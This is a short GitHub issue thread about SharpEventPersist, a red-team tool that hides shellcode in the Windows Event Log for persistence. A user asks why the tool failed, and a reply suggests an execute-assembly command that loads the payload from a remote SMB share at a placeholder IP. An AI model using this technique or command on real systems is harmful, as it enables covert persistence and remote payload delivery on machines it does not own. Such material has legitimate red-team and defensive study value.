improsec / SharpEventPersist

Persistence by writing/reading shellcode from Event Log

hello, #2

Open ZHOUXINGXING9 opened 2 years ago

ZHOUXINGXING9 commented 2 years ago

Using shellcode: C:\Users\Administrator\Desktop\payload.bin
Setting event log instance id: 1337
Setting event log source to: Cobaltstrick
Setting event log to: Key Management Service
[-] Invoke_3 on EntryPoint failed.

why?

roobixx commented 2 years ago

Is the payload binary on the target at C:\Users\Administrator\Desktop\payload.bin? If not, it will fail because SharpEventPersist looks at the file path on the target it is running on.

If you want to host your payload remotely, you could do something like this:

execute-assembly /home/rbx/payload.bin -file \\<IP>\Share\payload.bin

Where the IP is an SMB server with your payload. I used Impacket's SMBserver for my testing and it worked well.